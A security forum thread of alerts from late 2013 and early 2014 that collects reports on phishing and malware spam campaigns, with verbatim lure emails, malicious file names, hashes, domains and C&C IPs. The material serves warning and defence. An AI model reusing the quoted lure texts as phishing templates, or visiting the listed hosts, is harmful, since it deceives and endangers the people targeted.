The attached ZIP file has the name License_Key_OR8957.zip and contains the 209 kB large file License_Key_Document_Adobe_Systems_Incorporated.exe. The trojan is known as Win32:Malware-gen, W32/Trojan.BDDH-7155, W32/Trojan3.GVP, Trojan-Downloader.Win32.Dofoil.rqh or Artemis!30AAE526F5C4. At the time of writing, 11 of the 45 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/a6cb6905775a7c4995222b3d91e7513a405d0cd183b7106dd713e720b2a4762a/analysis/1387485019/

Alert: Adobe License Key Email Scam
- http://blogs.adobe.com/psirt/2013/12/20/alert-adobe-license-key-email-scam/
Dec 20, 2013 - "Adobe is aware of reports that a phishing campaign is underway involving malicious emails purporting to deliver license keys for a variety of Adobe offerings. Customers who receive one of these emails should -delete- it immediately without downloading attachments or following hyperlinks that may be included in the message..."

:mad: :fear:

AplusWebMaster
2013-12-20, 19:24
FYI...

Fake ADP Fraud Secure Update Spam
- http://threattrack.tumblr.com/post/70587915512/adp-fraud-secure-update-spam
Dec 20, 2013 - "Subjects Seen:
ALERT! From ADP: 2013 Anti-Fraud Secure Update
Typical e-mail details:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre. Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll
on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have.

Malicious File Name and MD5:
2013 Anti-Fraud Secure Update.zip (EFF54DFFF096C439D07B50A494D6B435)
2013 Anti-Fraud Secure Update.exe (D4CBC4F2BE31277783F63B3991317AFE)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/206afa7c773e9cb15ab7c24bf8116ac4/tumblr_inline_my41kdEEtA1r6pupn.png

Tagged: ADP, Upatre
___

Fake Dept. of Treasury - Notice of Outstanding Obligation Spam
- http://threattrack.tumblr.com/post/70597137872/department-of-treasury-notice-of-outstanding-obligation
Dec 20, 2013 - "Subjects Seen:
Department of Treasury Notice of Outstanding Obligation - Case L3FY2OH7CD1N9OS
Typical e-mail details:
Important please review and sign the attached document!
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Malicious File Name and MD5:
FMS-Case-L3FY2OH7CD1N9OS.zip (D82A734CC165A85D1C19C65A6A9EA2A7)
FMS-.exe (167744869CBD5560810B7CF2A03BD6FF)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c9ca0241c01bd51afa7ee8985765bc24/tumblr_inline_my47ubkkd51r6pupn.png

Tagged: Upatre, Department of Treasury
___

Fake AT&T voicemail - malware...
- http://www.hoax-slayer.com/atandt-new-voice-mail-malware.shtml
Dec 20, 2013 - "... Message purporting to be from telecommunications company AT&T claims that a new voicemail could not be delivered to the recipient. The email includes an attached file that supposedly contains the voicemail.
Analysis: The message is not from AT&T and the attached file does not contain a missed voicemail. Instead, the attachment harbours a malicious .exe file hidden within a .zip file. Opening the .exe file can install malware on the user's computer...
> http://www.hoax-slayer.com/images/atandt-new-voice-mail-malware-1.jpg
This attack is similar to another malware distribution that claims that WhatsApp users have a new voicemail waiting. Clicking the "Play" button in the -bogus- email will open a malicious website that harbours malware..."

:fear: :mad:

AplusWebMaster
2013-12-23, 20:33
FYI...

Fake QuickBooks SPAM / Invoice.zip
- http://blog.dynamoo.com/2013/12/quickbooks-spam-invoicezip.html
23 Dec 2013 - "This -fake- QuickBooks spam has a malicious attachment:
Date: Mon, 23 Dec 2013 07:54:35 -0800 [10:54:35 EST]
From: QuickBooks Invoice [auto-invoice@ quickbooks .com]
Subject: Important - Payment Overdue
Please find attached your invoices for the past months. Remit the payment by 12/23/2013 as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Randal Owen ...

Attached to the message is a file Invoice.zip which has a VirusTotal detection rate of 5/44*, which in turn contains a malicious executable Invoice.exe with a detection rate of 5/49**. Automated analysis... shows an attempted connection to wifordgallery .com on 174.127.73.250 (Hosting Services Inc, US), it appears to be the only domain on that server so blocking the IP or domain itself may give you some protection against this current run of malware."
* https://www.virustotal.com/en-gb/file/f699d5ff02ea67276220385c5d6335ee8005f9ab30a0da82cde592e83e7f7595/analysis/1387814800/

** https://www.virustotal.com/en-gb/file/200f56fec7d3b793662ad9481f153f80cc79bc0f76ba999b8f5c24cea1ee9d88/analysis/
___

More Email scams, spam...
- https://isc.sans.edu/diary.html?storyid=17276
Last Updated: 2013-12-23 20:27:58 - "... new wave of email making the rounds, with a message that looks as follows:
> https://isc.sans.edu/diaryimages/images/c1.jpg
... The subject seems to be one of "Delivery Canceling", "Express Delivery Failure" or "Standard Delivery Failure". Next to Costco, the same scam is currently ongoing for BestBuy and Walmart, maybe others. The links are (appear to be) random or encoded, there is no repeat occurrence of the URL and "package number" for the entire sample set that we have. It could well be that the BASE64 portion of the URL contains an encoded hash of the email address to which the phish was sent, so when you play with one of the samples, be mindful that you could be confirming the email address back to the bad guys... For a change, clicking on the link doesn't bring up a web form asking for your credit card number. Instead, it quite bluntly downloads a ZIP which contains an EXE. What makes this particular version more cute than others is that the EXE inside the ZIP is re-named on the fly, based on the geolocation of your download request. In my case, this spoiled the fun some, because "CostcoForm_Zürich.exe" and "CostcoForm_Hamburg.exe" didn't look all that credible: There are no Costcos in Switzerland or Germany :) ... As for the malware: Lowish detection as usual, Virustotal 12/44*. Malwr/Cuckoo analysis**. The malware family so far seems to have a MUTEX of "CiD0oc5m" in common, and when run, it displays a Notepad that asks the user to try again later (while the EXE installs itself in the background)... Hosts currently seen pushing the malware include:
bmaschool .net Address: 61.47.47.35
bright-color .de Address: 78.46.149.229
am-software .net Address: 64.37.52.95
artes-bonae .de Address: 81.169.145.149
automartin .com Address: 46.30.212.214
almexterminatinginc .com Address: 50.63.90.1
brandschutz-poenitz .de Address: 81.169.145.160
All these sites have been on the corresponding IP addresses since years, which suggests that these are legitimate web sites that have been compromised/hacked, and are now being abused to push malware..."
* https://www.virustotal.com/en/file/f80c9b51c6357ca07f7204ab5a60b3912180103ac64e6dfaf15e6dc9481a028d/analysis/1387825985/

** https://malwr.com/analysis/MjUxNzExNGIwMTJkNGY4MThiMTI0MTJlMWRjYmM0NzU/
"... Hosts: IP 95.101.0.114 ..."
- https://www.virustotal.com/en/ip-address/95.101.0.114/information/

Keywords: malware scam
___

Fake Court hearing SPAM - Court_Notice_Jones_Day_Wa#8127.zip
- http://blog.dynamoo.com/2013/12/hearing-of-your-case-in-court-nr6976.html
23 Dec 2013 - "... malicious attachment:
Date: Mon, 23 Dec 2013 10:05:38 -0500 [10:05:38 EST]
From: Notice to Appear [support.6@ jonesday .com]
Subject: Hearing of your case in Court NR#6976
Notice to Appear,
Hereby you are notified that you have been scheduled to appear for
your hearing that
will take place in the court of Washington in January 9, 2014 at 10:00
am.
Please bring all documents and witnesses relating to this case with
you to Court on your hearing date.
The copy of the court notice is attached to this letter.
Please, read it thoroughly.
Note: If you do not attend the hearing the judge may hear the case in
your absence.
Yours truly,
Alison Smith
Clerk to the Court.

There is an attachment Court_Notice_Jones_Day_Wa#8127.zip which in turn contains an executable Court_Notice_Jones_Day_Washington.exe which is presumably malicious, but I can't analyse it. The VirusTotal detection rate for the ZIP is 4/49*."
* https://www.virustotal.com/en-gb/file/0067a31360bda03b85ceac1df405bd073cb86d9fdd6b6f9c5529bf77a160dac7/analysis/1387815631/

Same stuff D.D.: https://isc.sans.edu/diary.html?storyid=17279
Last Updated: 2013-12-24 00:54:04
Keywords: scam spam malware

:fear::mad:

AplusWebMaster
2013-12-30, 13:43
FYI...

Fake Apple reactivation email - phishing attempt
- http://blog.mxlab.eu/2013/12/30/reactivation-email-from-service-apple-is-fake-and-contains-a-phishing-attempt/
Dec 30, 2013 - "MX Labs... intercepted a phishing email from the spoofed email address “Service Apple <client@ apple .com>” with the subject “Reactivation No: A3556P325LL346E?” and the following body:
Dear (e) client (e)
We inform you that your account is about to expire in less than 48 hours, it is imperative to conduct an audit of your information now, otherwise your account will be deleted.
Download the attached form and open it in your browser and make your request.
Why you email he sent?
The sending of this email applies when the date of expiration of your account will terminate.
Thank you,
Assistance Apple customers

Screenshot: http://img.blog.mxlab.eu/2013/20131230_apple_phish_1.gif

The email comes with the attachment Apple.html. Once opened you will have the following screen:
> http://img.blog.mxlab.eu/2013/20131230_apple_phish_2.gif
The HTML page contains code to use an -iframe- and the real web form is hosted on hxxp ://photosappl.bbsindex .com:89/apple .com/ca/index.html.
Once all the details are filled in, the user is -redirected- to the official log in page of Apple at https ://secure2.store.apple .com/es/sign_in/."
___

Fake Tesco phish ...
- http://www.welivesecurity.com/2013/12/30/phishing-for-tesco-shoppers/
Dec 30, 2013 - "... -scam- message again, just for comparison.
Dear Valued Customer,
NatWest is giving out free shopping vouchers for your favorites stores for Christmas.
This offer is only for NatWest Credit Card Online Services users and it will be valid to use until the 31st of December, 2013
To Qualify for this opportunity, Kindly Click here now.
After validation your voucher will be sent via text message or posted to your Mailbox.
Yours Sincerely,
NatWest Credit Card Services.

The example below – with the subject header “Free Tesco Vouchers for Christmas.” – is a little more sophisticated. For a start, it has the festive Tesco Bank logo currently in use, complete with Google-ish party hat on the ‘O’. And since TESCO is probably better known for its supermarkets than for its banking and insurance services, even to people who never use it, it’s rather more credible that the bank might be offering vouchers for Tesco stores, rather than the vague and ungrammatical ‘your favorites stores’...
> http://www.welivesecurity.com/wp-content/uploads/2013/12/tesco-logo.png
Dear Valued Customer,
Tesco Bank is giving you a chance to shop for free at any of our tesco outlets or online by giving out free tesco vouchers for Christmas.
This offer is only for Tesco Credit Card and Tesco Savings/Loan owners and it will be valid to use until the 31st of December,2013.
SAVINGS OR LOAN CUSTOMER CLICK THE LINK BELOW
Savings/Loan Click here to Claim
CREDIT CARD CUSTOMER CLICK THE LINK BELOW
Credit Card Click here to Claim
After validation your voucher will be sent via text message or posted to your Mailbox.
Tesco Personal Finance Online Service

Most bank phishing messages come in waves/campaigns, and they’re not particularly topical. The scammers keep sending out material that falls into one of the same set of social engineering categories... While they want you to respond immediately (before you have time to think about it, and before the link disappears because security researchers have found it and taken action), the content isn’t particularly topical. This one, however, resembles the sort of topical approach we associate with other kinds of malicious activity (botnets, fake AV, charity/disaster relief scams and so on) where social engineering is based on a current seasonal event (Xmas, Valentine’s Day, Cyber Monday) or news item (real or fake)..."
___

Snapchat security issues ...
- http://www.darkreading.com/vulnerability/researchers-reveal-snapchat-security-iss/240165041?printer_friendly=this-page
Dec 27, 2013 - "Snapchat, the popular photo messaging service, got a visit from the privacy Grinch this Christmas season after researchers released details of an exploit that abuses Snapchat's "Find My Friends" feature. The visit was the work of Gibson Security*, which first notified Snapchat of this and other security issues back in August. According to the group, Snapchat did not respond, compelling Gibson Security to publicly release more details and some proof-of-concept code on Christmas Eve. The first target: Snapchat's Find My Friends feature. Typically, Find My Friends enables users to look up their friends' usernames by uploading the phone numbers in their devices' address book and searching for accounts that match those numbers. The researchers, however, were able to abuse that capability to do that on a massive scale... researchers say an attacker could use the Snapchat API to write an automated program that generates phone numbers and searches them against the Snapchat database as a step toward building a database of social networking profiles that could be sold to others..."
* http://gibsonsec.org/

:fear: :mad:

AplusWebMaster
2014-01-02, 22:30
FYI...

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Deposit Statement Email Messages - 2014 Jan 02
Fake Business Complaint Notification Email Messages - 2014 Jan 02
Fake Personal Picture Email Messages - 2014 Jan 02
Fake Hotel Reservation Request Email Messages - 2014 Jan 02
Fake Account Payment Information Email Messages - 2014 Jan 02
Fake Product Purchase Request Email Messages - 2014 Jan 02
Fake Online Purchase Email Messages - 2014 Jan 02
Fake Account Information Request Email Messages - 2014 Jan 02
Fake Payment Notification - 2014 Jan 02
Fake Job Offer Documents Email Messages - 2014 Jan 02
Fake Account Refund Email Messages - 2014 Jan 02
Fake Court Appearance Request Email Messages - 2014 Jan 02
Fake Product Order Email Messages - 2014 Jan 02
(More detail and links at the cisco URL above.)

:mad: :sad:

AplusWebMaster
2014-01-03, 23:29
FYI...

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Email Messages with Malicious Images - 2014 Jan 03
Fake Financial Document Delivery Email Messages - 2014 Jan 03
Fake Product Order Inquiry Email Messages - 2014 Jan 03
Fake Court Hearing Documents Email Messages - 2014 Jan 03
Fake Product Purchase Order Email Messages - 2014 Jan 03
Fake Shipping Information Email Messages - 2014 Jan 03
Fake Payroll Invoice Email Messages - 2014 Jan 03
Fake Bank Transfer Notification Email Messages - 2014 Jan 03
Fake Account Bill Statement Email Messages - 2014 Jan 03
Fake Court Appearance Request Email Messages - 2014 Jan 03
Fake Financial Report Email Messages - 2014 Jan 03
Fake Order Details Email Messages - 2014 Jan 03
Fake Invoice Statement Attachment Email Messages - 2014 Jan 03
Fake Account Payment Confirmation Email Messages - 2014 Jan 03
Fake Personal Photos Email Messages - 2014 Jan 03
Fake Online Order Details Email Messages - 2014 Jan 03
Fake Document Delivery Email Messages - 2014 Jan 03
Fake Court Documents Email Messages - 2014 Jan 03
Fake Services Invoice Email Messages - 2014 Jan 03
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2014-01-04, 16:22
FYI...

Malicious Ads from Yahoo
- https://isc.sans.edu/diary.html?storyid=17345
Last Updated: 2014-01-04 13:49:34 UTC - "According to a blog post from fox-it.com*, they found ads.yahoo .com serving malicious ads from Yahoo's home page as early as December 30th. The malicious traffic appeared to come from the following subnets 192.133.137.0/24 and 193.169.245.0/24. Most infections seem to be in Europe. Yahoo appears to be aware and addressing the issue, according to the blog..."
* http://blog.fox-it.com/2014/01/03/malicious-advertisements-served-via-yahoo/
Jan 3, 2014 - "... Clients visiting yahoo.com received advertisements served by ads.yahoo .com. Some of the advertisements are malicious. Those malicious advertisements are iframes... Upon visiting the malicious advertisements users get redirected to a “Magnitude” exploit kit via a HTTP redirect to seemingly random subdomains of:
boxsdiscussing .net
crisisreverse .net
limitingbeyond .net
and others
All those domains are served from a single IP address: 193.169.245.78 *. This IP-address appears to be hosted in the Netherlands. This exploit kit exploits vulnerabilities in Java and installs a host of different malware including:
ZeuS
Andromeda
Dorkbot/Ngrbot
Advertisement clicking malware
Tinba/Zusy
Necurs
The investigation showed that the earliest signs of infection were at December 30, 2013. Other reports suggest it might have started even earlier... it’s unclear why those countries are most affected, it is likely due to the configuration of the malicious advertisements on Yahoo.
> http://foxitsecurity.files.wordpress.com/2014/01/yahoo-ad-distribution.jpg?w=448&h=387
... Block access to the following IP-addresses of the malicious advertisement and the exploit kit:
Block the 192.133.137/24 subnet
Block the 193.169.245/24 subnet
Also closely inspect network traffic for signs of successful exploits for any of the dropped malware. Yahoo is aware of the issue and looking into it.
Please watch this page for updates.
Update: January 3, 1815 (GMT+1): It appears the traffic to the exploit kit has significantly decreased. It looks like Yahoo is taking steps to fix the problem."

* https://www.virustotal.com/en/ip-address/193.169.245.78/information/

- http://help.yahoo.com/kb/index?page=content&y=PROD_FRONT&locale=en_US&id=SLN22569
Update on ads 1/5/14

:fear: :mad: :fear:

AplusWebMaster
2014-01-06, 15:20
FYI...

Fake Amazon account phish
- http://blog.dynamoo.com/2014/01/unauthorized-activity-on-your-amazon.html
6 Jan 3024 - "... new wave of phishing emails, here's a new one looking for Amazon credentials.
Date: Mon, 6 Jan 2014 08:19:39 -0000 [03:19:39 EST]
From: Amazon [noreply@ trysensa .com]
Case- 91289-90990
Unauthorized Activity on your Amazon account.
We recently confirmed that you had unauthorized activity on your Amazon account.
Please be assured that because your card includes "zero-liability fraud protection" , you are not responsible for unauthorized use of your card.
Unfortunately, we have not confirmed your complete information , please follow the instructions below.
Click the link below to validate your account information using our secure server:
Click Here To Active Your Amazon Account
For your protection, you must verify this activity before you can continue using your account
Thank You.
Amazon LTD Security System

The link in the email goes to [donotclick]immedicenter .com/immedicenter/images/yootheme/menu/Amazon/index.php and comes up with a convincing-looking Amazon login page:
> http://2.bp.blogspot.com/-NtFM6bDPGL4/UsqVU6VUT5I/AAAAAAAACYk/vN_Mb3KZDis/s1600/amazon-login-1.png
The next page phishes for even more information... it goes after your credit card information... then gets sent to the genuine Amazon .com website. In most email clients, floating over the link would clearly demonstrate that this was not the legitimate amazon.com website, and certainly once visited (not something I would recommend) then the address bar at the top of the browser would clearly indicate it is -not- amazon .com. If you have accidentally clicked through this email and provided all the details then you should contact your bank immediately and also change your Amazon password plus any other places that you use that same username/password combination."
___

The $9.84 Credit Card Hustle
- http://krebsonsecurity.com/2014/01/deconstructing-the-9-84-credit-card-hustle/
Jan 6, 2014 - "Over the holidays, I heard from a number of readers who were seeing strange, unauthorized charges showing up on their credit and debit cards for $9.84... repeatedly advised readers to keep a close eye on their bank statements for -bogus- transactions. It’s still not clear how consumers’ card numbers are being stolen here, but the fraud appears to stem from an elaborate network of affiliate schemes that stretch from Cyprus to India and the United Kingdom. One reader said the $9.84 charge on her card came with a notation stating the site responsible was eetsac .com. I soon discovered that there are -dozens- of sites complaining about similar charges from similarly-constructed domains; for example, this 30-page thread* at Amazon’s customer help forums includes gripes from hundreds of people taken by this scam.
> http://krebsonsecurity.com/wp-content/uploads/2014/01/homecs.png
... A closer look at some of those domains reveals a few interesting facts. Callscs .in, for example, is a Web site for a call center and a domain that has been associated with these $9.84 fraudulent charges. Callscs .in lists as its local phone number 43114300. That number traces back to a call center in India, Call Connect India, Inc., which registers its physical address as Plot No 82, Sector 12 A, Dwarka. New Delhi – 110075... this is not a new type of fraud, nor is this particular fraud a recent occurrence — although the bogus $9.84 charges do appear to have spiked around the holidays. Most of the domains involved in this scheme were registered a year ago or more, and a quick search on the amount $9.84 shows that the fraudsters responsible for this scheme have been at it since at least the first half of 2013. If you see a charge like this or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card in the odd chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to abused like this again..."
(More detail at the krebsonsecurity URL above.)
* http://www.amazon.com/gp/help/customer/forums/ref=cm_cd_pg_oldest?ie=UTF8&authToken=&cdForum=Fx2NFGOONPZEXIP&cdPage=1&cdSort=newest&cdThread=Tx2EME4IL59BUP4

> http://www.scambook.com/search?search=IAWCS.COM&sort=relevance
___

Zeus spoofing Bitdefender AV ...
- http://www.webroot.com/blog/2014/01/06/zeus-infection-spoofing-bit-defender-av/
Jan 6, 2014 - "... noticed a large amount of -Zeus- infections that are -spoofing- the Bitdefender name. While infections spoofing AV companies aren’t unusual, it’s been a while since we have seen such a spike on one particular vendor in such a short time period. Most of the names are slight variations, but the numbers are impressive – Overall, we have seen 40,000 unique MD5`s in the last week alone! The infection being dropped is from the Zeus family of infections, which are banking Trojans designed to steal login information when the user logs into their online banking website... This infection can get onto a user’s PC via a number of different methods, but the most common is through an exploit kit. The commonly used Blackhole exploit kits uses Java Exploits to drop and execute a file. Unless the user is very alert, they typically won’t even notice they are infected. Once executed, the infection will try a number of methods to make sure it is automatically ran on start-up... the infection may connect to a remote server and receive updates and it can also download other infections (Cryptolocker/ICE and other Rogue AV`s)... Due to the infection route of this particular infection, it is advisable to have the latest version of Java installed and preferably use a modern secure browser with the latest Windows updates installed. The latest build of Firefox disables Java plugins by default, which should help stop this particular attack vector... this infection has also been seen to be spread by email... Always be alert to any email attachments, even if they’re from friends/relatives, and especially executable files that are inside a zip file..."

:fear::fear: :mad:

AplusWebMaster
2014-01-07, 13:07
FYI...

Spam... trends of 2013
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-year-of-spam-the-notable-trends-of-2013/
Jan 7, 2014 - "... still saw traditional types of spam, we also saw several “improvements” which allowed spammers to avoid detection and victimize more users. We also saw spam utilized more to carry malware since the start of the year.
Spam volume from 2008...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/2013-spam-volume.jpg
... In 2013, we saw 198 BHEK spam campaigns, a smaller number compared to the previous year... In this particular spam run, the volume of spammed messages reached up to 0.8% of all spam messages collected during the time period.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/2013-BHEK.jpg
... The number of BHEK spam runs dwindled until there was none in December... the use of malware attachments remains constant in the threat landscape. This suggests that there are users who still fall prey to simple techniques (such as urging users to click on an attachment). We noticed that the number of spam with malicious attachments fluctuated throughout the year, before it steadily increased in the latter months.
Volume of spam messages with -malicious- attachments
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/01/spam-malware-attachment.jpg
From the first to third quarter of the year, ZBOT/ZeuS was the top malware family distributed by spam. This family is known for stealing financial-related information. Halfway into the third quarter, however, we noticed that TROJ_UPATRE* unseated ZBOT and became the top malware attachment. In November, about 45% of all malicious spam with attachments contained UPATRE malware. UPATRE became notorious for downloading other malware, including ZBOT malware and ransomware, particularly CryptoLocker. This type of attack is doubly risky for users because not only will their information be stolen, their files will also become inaccessible..."
* http://about-threats.trendmicro.com/us/malware/TROJ_UPATRE.VNA
___

64-bit ZBOT leverages Tor - improves evasion techniques
- http://blog.trendmicro.com/trendlabs-security-intelligence/64-bit-zbot-leverages-tor-improves-evasion-techniques/
Jan 7, 2014 - "... we have confirmed that several ZBOT 32-bit samples (detected as TSPY_ZBOT.AAMV) do have an embedded 64-bit version (detected as TSPY64_ZBOT.AANP). However, our investigation also lead us to confirm other noteworthy routines of the malware, including its antimalware evasion techniques... Like any ZBOT variant, TSPY_ZBOT.AAMV injects its code into the normal process explorer.exe. If the running process is 64-bit, the malware then loads the 64-bit version of the malware. If not, it will continue to execute the 32-bit version. The other notable feature of this ZBOT variant is its Tor component, which can hide the malware’s communication to its command-and-control (C&C) servers... This 64-bit version for ZeuS/ZBOT is an expected progression for the malware, especially after ZeuS source code was leaked back in 2011. Since then, we have seen several reincarnations of the malware, most notably in the form of KINS and its involvement with other malware such as Cryptolocker and UPATRE. Adding other functionalities such as rootkit capability and the use of a Tor component are further proof that we can see more modifications in the future, particularly those that help circumvent or delay antimalware efforts..."
___

Wells Fargo Important Documents Spam
- http://threattrack.tumblr.com/post/72579411468/wells-fargo-important-documents-spam
Jan 7, 2014 - "Subjects Seen:
ATTN: Important Bank Documents
Typical e-mail details:
We have received this documents from your bank, please review attached documents.
Lanny Hester
Wells Fargo Advisors

Malicious File Name and MD5:
BankDocs-4F17B9844A.zip (1A493400DBDE62CC64AB2FC97985F07B)
BankDocuments_FE0274A4593F58683C1949896834F32939859835947694653298321744361597236489231640913264.pdf.exe (8F24720E4D08C986C0FE07A66CCF8380)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7a3955f21a2e5cf1833d2538b6a7b5fc/tumblr_inline_mz1s1nPzwB1r6pupn.png

Tagged: wells fargo, Upatre
___

'Adobe License Service Center Order NR’ and ‘Notice to appear in court’ themed malicious spam ...
- http://www.webroot.com/blog/2014/01/07/adobe-license-service-center-order-nr-notice-appear-court-themed-malicious-spam-campaigns-intercepted-wild/
Jan 7, 2014 - "... Despite the lack of blog updates over the Holidays, we continued to intercept malicious campaigns over the same period of time, proving that the bad guys never take holidays... The first campaign successfully impersonates Adobe’s License Service Center, in an attempt to trick users into thinking that they’ve successfully purchased a Creative Suite 6 Design Standard software license key.
Sample screenshot of the first spamvertised campaign:
> https://www.webroot.com/blog/wp-content/uploads/2014/01/Adobe_License_Service_Center_Spam_Spamvertised_Malware_Malicious_Software_Social_Engineering1.png
Detection rate for the spamvertised attachment: MD5: 10dbbaaceda4dce944ebb9c777f24066 * TrojanDownloader:Win32/Kuluoz.D.
The second campaign, attempts to trick users into thinking that they’ve received a notice to appear in court.
Sample screenshot of the spamvertised attachment:
> https://www.webroot.com/blog/wp-content/uploads/2014/01/Chicago_Court_Spam_Spamvertised_Malware_Malicious_Software_Social_Engineerig1.png
Detection rate for the spamvertised attachment: MD5: c77ca2486d1517b511973ad1c923bb7d ** TrojanDownloader:Win32/Kuluoz.D; Backdoor.Win32.Androm.bket.
Once executed the sample phones back to:
... 109.169.87.141... also known to have responded to 200.98.141.0 ... Two more MD5s are known to have responded to the same C&C IP in the past..."
* https://www.virustotal.com/en/file/d5ec477dc0b39867b39a56b9ca7652c8ea115533583d8b6211c1e4f53537bbb2/analysis/1389006917/

** https://www.virustotal.com/en/file/bc55a78b008cce2102f3679adc4694211cf61710e2bcf49391365928a0e96519/analysis/1389008875/

:fear::fear: :mad:

AplusWebMaster
2014-01-08, 17:11
FYI...

More malicious "Voice Message from Unknown" SPAM
- http://blog.dynamoo.com/2014/01/more-voice-message-from-unknown-spam.html
8 Jan 2014 - "Another bunch of fake "voice message" spams with a malicious payload are doing the rounds, for example:
Subject: Voice Message from Unknown (996-743-6568)
Subject: Voice Message from Unknown (433-358-8977)
Subject: Voice Message from Unknown (357-973-7738)
Body:
- - -Original Message- - -
From: 996-743-6568
Sent: Wed, 8 Jan 2014 12:06:38 +0000
To: [redacted]
Subject: Important Message to All Employees

Attached is a file VoiceMessage.zip which in turn contains VoiceMessage.exe which has a VirusTotal detection rate of 11/47*. Automated analysis tools... show an attempted connection to casbir .com .au on 67.22.142.68 (Cologlobal, Canada). This appears to be the only server on this IP address, so blocking or monitoring it for the time being may be prudent."
* https://www.virustotal.com/en-gb/file/040ffe7e91bf3f640e62bea1deea85280256eff407c6c176d63b730731eda2dd/analysis/1389191399/
___

jConnect Fax Spam
- http://threattrack.tumblr.com/post/72662543973/jconnect-fax-spam
Jan 8, 2014 - "Subjects Seen:
jConnect fax from “<phone number>” - 21 page(s), Caller-ID: <phone number>
Typical e-mail details:
Fax Message [Caller-ID: <phone number>]
You have received a 21 page(s) fax at 2012-12-17 05:25:32 EST.
* The reference number for this fax is lax3_did10-1514386087-4062628129-11.
This message can be opened using your PDF reader. If you have not already installed j2 Messenger, download it for free: j2.com/downloads
Please visit j2 .com/help if you have any questions regarding this message or your j2 service.
Thank you for using jConnect!

Malicious File Name and MD5:
FAX_93-238738192_19.zip (3A8CAA5972CF72CCEB0C40531C28B5AB)
FAX_93-238738192_19.exe (CA2628B955CAC2C8B6BD9F8C4C504FA4)

Screenshot: https://31.media.tumblr.com/245418432179a0bd5297d62bf564f010/tumblr_inline_mz375kXLm51r6pupn.png

Tagged: jconnect, Upatre
___

LinkedIn Makes Federal Case Out of Fake Accounts
- http://blogs.wsj.com/digits/2014/01/07/linkedin-makes-federal-case-out-of-fake-accounts/
Jan 7, 2014 - "LinkedIn, the business-focused social network, charged in a federal civil lawsuit that 10 unnamed people had created thousands of fake accounts that can be used to pass on malicious computer code or puff up users’ profiles. In a suit filed Monday in U.S. District Court for the Northern District of California, LinkedIn said it had deleted the abusive accounts and traced them to an Amazon Web Services account. It’s asking the cloud computing giant to hand over the names of the owners of the web-services accounts. Amazon Web Services offers computing power for rent via the Internet. An Amazon spokeswoman did not immediately respond to a request for comment. LinkedIn accuses the unnamed people of violating its user agreement by creating multiple fake accounts that stole data from legitimate LinkedIn profiles through a method called scraping*..."
* http://www.hotforsecurity.com/blog/linkedin-files-lawsuit-against-fake-account-creators-7594.html
Jan 8, 2014 - "... In November, Bitdefender warned about fake LinkedIn profiles that gather personal details** and lead users to dangerous websites..."
** http://www.hotforsecurity.com/blog/alluring-fake-recruiters-entice-linkedin-users-with-attractive-job-offers-7362.html
Nov 21, 2013 - "... As many users speak English and a native language, the scam aims at most countries in the world especially the US, where over 84 million users are active on LinkedIn. The fake recruiter spreads the link to the scam using URL shortening techniques. The bogus profile of “Annabella Erica” was already injected into authentic LinkedIn groups such as Global Jobs Network, which includes 167,000 users worldwide. Members of the social network are now sharing insights on more than 2.1 million groups, so the number of victims exposed to the scam could be a lot higher. The fake employment website is registered on a reputable “.com” domain to avoid raising doubts as to its authenticity. Scammers gather e-mail addresses and passwords they may later use for identity theft. Fraudsters usually register websites for longer periods and sometimes make their pages look even better than legitimate websites..."
___

inTuit/TurboTax phish
- http://security.intuit.com/alert.php?a=95
1/7/14 - "Here is a copy of the phishing email people are receiving. Be sure -not- to open the attachment.

TurboTax Alert: Your $4,120.55 Tax Refund!
> http://security.intuit.com/images/ttphish.jpg
Dear Customer,
You've received a Tax Refund of $4,120.55.
Kindly find attached file to view your Refund Confirmation from TurboTax.
Please keep this refund confirmation for your records.
NOTE: TurboTax/IRS will not request your banking details through email, sms or telephone.
Thank you for using TurboTax

This is the end of the -fake- email.
Steps to Take Now:
Do -not- open the email attachment...
Delete the email."

:mad: :fear:

AplusWebMaster
2014-01-09, 07:26
FYI...

Fake Browser update site installs Malware
- http://www.symantec.com/connect/blogs/fake-browser-update-site-installs-malware
9 Jan 2014 - "In the first week of 2014, we came across a website using tried and tested social engineering techniques to coerce victims into installing malware. The domain http ://newyear[REMOVED]fix .com, was registered on Dec 30, 2013. Based on our research, 94 percent of attacks appear to be targeting users based in the United Kingdom through advertising networks and free movie streaming and media sites... This particular social engineering attack is not novel, and plays on victims’ fear of needing to install urgent updates. Since the domain was registered only last week, it appears the attacker thought of this scheme at the very last minute, as the holiday season starts winding down. The website, which is hosted in the -Ukraine- uses a dual hybrid Web server setup by Apache and Nginx, with the latter identifying the victim’s browser and performing a redirect. The user will see the Google Chrome, Mozilla Firefox, and Microsoft Internet Explorer templates...
Page displayed to Chrome users
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Fake%20Browser%20Update%201.png
Page displayed to Firefox users
